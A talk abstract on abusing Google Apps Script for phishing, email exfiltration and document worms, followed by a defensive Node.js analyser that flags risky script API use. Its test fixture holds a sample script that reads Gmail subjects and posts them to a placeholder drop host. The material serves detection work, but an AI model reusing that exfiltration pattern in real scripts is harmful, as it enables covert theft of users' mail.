Cloud Of Suspicion: Scaling Up Phishing Campaigns Using Google Apps Scripts, presented at DeepSec 2017

by Maor Bin

Summary: Google Apps Script is a JavaScript-based cloud scripting language that provides easy ways to automate tasks across Google products and third-party services and to build web applications. However, it also gives attackers relatively easy ways to automate infiltration, propagation, exfiltration and maintaining access in a compromised G Suite powered organization. While the platform has been used successfully for C&C (Carbanak) previously, we feel it only scratched the surface as potential vectors go.
In this talk we'll present original and innovative methods of launching classical attacks using Google Apps Script, as well as possible ways of detecting and preventing those attacks.
Presentation Outline
1. Scripts intro & background.
- Types of scripts
- Capabilities & limitations
2. Infiltration examples
- Standalone/URL — a direct link to the script sent to a victim, using the Google domain as the trust vehicle
- Bound scripts — scripts embedded in documents, much like Office macros, with similar capabilities
3. Exfiltration / Communication Examples
- Auto-forward emails — bypass the Gmail forwarding limitation, forward the user's email to us, remove traces of the sent email
- Post to external URL — post selected files' contents via encoded headers to a remote drop location of our choice
- Google Apps Script as C&C — (Carbanak discussion?)
** DEMO ** Use Google Apps Script as self-executing JavaScript inside a Google Doc and send it to multiple users as a phishing campaign.
4. Propagation — “Google Docs” worm discussion: creating a “Google Docs” worm with Google Apps Script
5. Detecting and preventing malicious scripts
- Whitelist / blacklist, permission-based, pre-defined
- Script static analysis, enumeration based on script contents
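As an added example (not the speaker's tool, and not code from the talk), the following Node.js script is a small rule-based static analyser for Apps Script source that implements the two detection ideas in section 5: it enumerates the Apps Script API calls a script's contents rely on, maps each hit to the outline's attack phase and to the OAuth scope the platform would force the script to request, and then applies a pre-defined, permission-based allow-list. The rule table, the phase mapping, the risk logic and both sample scripts are constructed for this example; the scope strings follow the standard Apps Script OAuth scope names.

```javascript
'use strict';

// Rule table (constructed for this example): an API-usage pattern in Apps Script
// source, the attack phase from the outline it supports, and the OAuth scope the
// platform would make the script request when that API is used.
const RULES = [
  { id: 'gmail-access', phase: 'exfiltration',
    scope: 'https://mail.google.com/',
    re: /\bGmailApp\.\w+\s*\(/ },
  { id: 'send-mail', phase: 'propagation',
    scope: 'https://www.googleapis.com/auth/script.send_mail',
    re: /\bMailApp\.sendEmail\s*\(/ },
  { id: 'external-request', phase: 'exfiltration',
    scope: 'https://www.googleapis.com/auth/script.external_request',
    re: /\bUrlFetchApp\.fetch(All)?\s*\(/ },
  { id: 'drive-enumeration', phase: 'exfiltration',
    scope: 'https://www.googleapis.com/auth/drive',
    re: /\bDriveApp\.(getFiles|getFolders|searchFiles|getRootFolder)\s*\(/ },
  { id: 'share-document', phase: 'propagation',
    scope: 'https://www.googleapis.com/auth/drive',
    re: /\.(addViewers?|addEditors?|setSharing)\s*\(/ },
  { id: 'installable-trigger', phase: 'persistence',
    scope: 'https://www.googleapis.com/auth/script.scriptapp',
    re: /\bScriptApp\.newTrigger\s*\(/ },
  { id: 'obfuscation', phase: 'evasion', scope: null,
    re: /\beval\s*\(|String\.fromCharCode|Utilities\.base64Decode\s*\(/ },
];

// Scan one script's source and return the matched rules, the scopes it would need,
// and a coarse risk verdict.
function analyseScript(source) {
  const findings = [];
  for (const rule of RULES) {
    const m = rule.re.exec(source);
    if (!m) continue;
    // 1-based line of the first hit, so a reviewer can jump to it.
    const line = source.slice(0, m.index).split('\n').length;
    findings.push({ rule: rule.id, phase: rule.phase, scope: rule.scope, line, hit: m[0] });
  }
  const phases = new Set(findings.map(f => f.phase));
  const scopes = [...new Set(findings.map(f => f.scope).filter(Boolean))];

  // Verdict (assumed policy): a read capability (mailbox or Drive) combined with an
  // outbound channel (external request, sharing, sending mail) is the exfiltration /
  // propagation chain the outline describes; persistence or obfuscation next to any
  // other capability is also treated as high.
  const reads = findings.some(f => ['gmail-access', 'drive-enumeration'].includes(f.rule));
  const sinks = findings.some(f => ['external-request', 'share-document', 'send-mail'].includes(f.rule));
  let risk = 'low';
  if (findings.length > 0) risk = 'medium';
  if ((reads && sinks) || (phases.size > 1 && (phases.has('persistence') || phases.has('evasion')))) risk = 'high';
  return { risk, scopes, findings };
}

// Permission-based allow-list: the script passes only if every scope it would
// request is in the organisation's pre-defined approved list.
function allowedByScopePolicy(report, approvedScopes) {
  const approved = new Set(approvedScopes);
  return report.scopes.every(s => approved.has(s));
}

// Constructed sample scripts (not from the talk). The second one strings together the
// outline's trigger + mailbox read + external POST pattern so the rules have hits.
const BENIGN_SCRIPT = `
function onOpen() {
  SpreadsheetApp.getUi().createMenu('Reports').addItem('Refresh', 'refresh').addToUi();
}
function refresh() {
  SpreadsheetApp.getActiveSheet().getRange('A1').setValue(new Date());
}`;

const SUSPICIOUS_SCRIPT = `
function onOpen() {
  ScriptApp.newTrigger('sync').timeBased().everyMinutes(5).create();
}
function sync() {
  var subjects = GmailApp.search('newer_than:1d').map(function (t) { return t.getFirstMessageSubject(); });
  var encoded = Utilities.base64Encode(subjects.join('|'));
  UrlFetchApp.fetch('https://drop.example.invalid/in', { headers: { 'X-Data': encoded } });
}`;

// Assumed org policy: only the Sheets scope is pre-approved for bound scripts.
const APPROVED_SCOPES = ['https://www.googleapis.com/auth/spreadsheets'];

for (const [name, src] of [['benign', BENIGN_SCRIPT], ['suspicious', SUSPICIOUS_SCRIPT]]) {
  const report = analyseScript(src);
  console.log(name, report.risk, allowedByScopePolicy(report, APPROVED_SCOPES) ? 'allowed' : 'blocked');
  for (const f of report.findings) console.log(`  line ${f.line}: ${f.rule} (${f.phase}) -> ${f.scope}`);
}
```

In a real deployment the source fed to `analyseScript` would come from enumerating the organisation's Drive for files of MIME type `application/vnd.google-apps.script` and pulling each project's content through the Apps Script API; that enumeration is left out here so the example runs offline. Regex rules are deliberately simple and will miss calls built from strings at runtime, which is why the obfuscation rule exists: a script that needs `eval` or `String.fromCharCode` to name its APIs is itself a finding.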